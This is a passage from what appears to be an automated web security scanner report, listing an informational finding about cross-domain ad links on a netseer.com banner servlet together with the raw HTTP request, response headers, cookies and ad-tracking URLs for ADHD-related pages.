                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.15707257390022278&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p2_r1_c2">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r1_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11372934281826019&cpos=3&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p3_r1_c3">
                                       ADHD in Adults
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r2_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04665462300181389&cpos=4&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p4_r2_c4">
                                       Hyperactivity Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r2_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Anxiety+Disorders+Symptoms&chash=8711261873686427320&cscr=0.08816888183355331&cpos=5&creg=0&cnads=20&cpc=2.2300000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p5_r2_c5">
                                       Anxiety Disorders Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r2_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14457887411117554&cpos=6&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p6_r2_c6">
                                       ADHD Treatment
                                       </a>
...[SNIP]...
<td id="cpts_c_p7_r3_c7">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADD+and+ADHD+Symptoms&chash=-4953049157564972247&cscr=0.06330152601003647&cpos=7&creg=0&cnads=12&cpc=5.980000019073486&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p7_r3_c7">
                                       ADD and ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p8_r3_c8">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Child+with+ADHD&chash=3007873813482410363&cscr=0.033913664519786835&cpos=8&creg=0&cnads=20&cpc=3.740000009536743&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p8_r3_c8">
                                       Child with ADHD
                                       </a>
...[SNIP]...
<td id="cpts_c_p9_r3_c9">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=About+Anxiety&chash=-2030480214097464183&cscr=0.0022842565085738897&cpos=9&creg=0&cnads=20&cpc=1.1399999856948853&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p9_r3_c9">
                                       About Anxiety
                                       </a>
...[SNIP]...

18.58. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fd%3B240321491%3B0-0%3B3%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd%3Bcontentid%3Dfbca8610%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Btax%3Dadhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276209219

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADD+and+ADHD+Information&chash=3660505418659665001&cscr=0.07337363809347153&cpos=5&creg=0&cnads=20&cpc=7.940000057220459&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07161686569452286&cpos=1&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.038799431174993515&cpos=4&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.18060718476772308&cpos=8&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14492054283618927&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11105802655220032&cpos=7&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=About+Depression&chash=-7096360666651597841&cscr=0.04372575879096985&cpos=9&creg=0&cnads=20&cpc=5.110000133514404&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Anxiety+Disorder+Treatment&chash=-7731748034838953721&cscr=0.015250958502292633&cpos=2&creg=0&cnads=20&cpc=1.7200000286102295&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04673968628048897&cpos=6&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fd%3B240321491%3B0-0%3B3%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd%3Bcontentid%3Dfbca8610%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Btax%3Dadhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276209219 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=109374225633552
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276179412,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fd96aac516b51c8,1311276204579,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:24 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:24 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276204580,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvZG9jdG9yLXJlY29tbWVuZGVkX3RpcHNfZm9yX3dvbWVuX3dpdGhfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:24 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:23:24 GMT
Content-Length: 12427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07161686569452286&cpos=1&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p1_r1_c1">
                                       ADHD Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r1_c2">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Anxiety+Disorder+Treatment&chash=-7731748034838953721&cscr=0.015250958502292633&cpos=2&creg=0&cnads=20&cpc=1.7200000286102295&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p2_r1_c2">
                                       Anxiety Disorder Treatment
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r1_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14492054283618927&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p3_r1_c3">
                                       ADHD Treatment
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r2_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.038799431174993515&cpos=4&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p4_r2_c4">
                                       ADHD Information
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r2_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADD+and+ADHD+Information&chash=3660505418659665001&cscr=0.07337363809347153&cpos=5&creg=0&cnads=20&cpc=7.940000057220459&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p5_r2_c5">
                                       ADD and ADHD Information
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r2_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04673968628048897&cpos=6&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p6_r2_c6">
                                       Hyperactivity Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p7_r3_c7">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11105802655220032&cpos=7&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p7_r3_c7">
                                       ADHD in Adults
                                       </a>
...[SNIP]...
<td id="cpts_c_p8_r3_c8">
